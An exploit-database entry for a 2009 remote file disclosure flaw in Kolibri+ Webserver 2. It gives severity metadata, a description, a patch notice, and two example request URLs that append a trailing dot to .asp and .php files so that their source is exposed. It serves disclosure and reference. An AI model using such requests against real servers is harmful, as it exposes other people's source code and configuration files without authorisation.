header-logo
Suggest Exploit
vendor:
Kolibri WebServer
by:
Skull-HacKeR
9.3
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: Kolibri WebServer
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:kolibri_webserver:kolibri_webserver:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Kolibri+ Webserver 2 , Remote file disclousure exploit

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. This will allow the attacker to view the contents of any file on the server, including sensitive files such as configuration files, source code, etc.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

#############################################################################################
#
#   Name    :   Kolibri+ Webserver 2 , Remote file disclousure exploit
#   Author  :   Skull-HacKeR
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote

[*] Exploitation

Exploit:
http://127.0.0.1/default.asp.
http://127.0.0.1/default.php.

# milw0rm.com [2009-09-11]

Navigation

Suggest Exploit

Services By CQR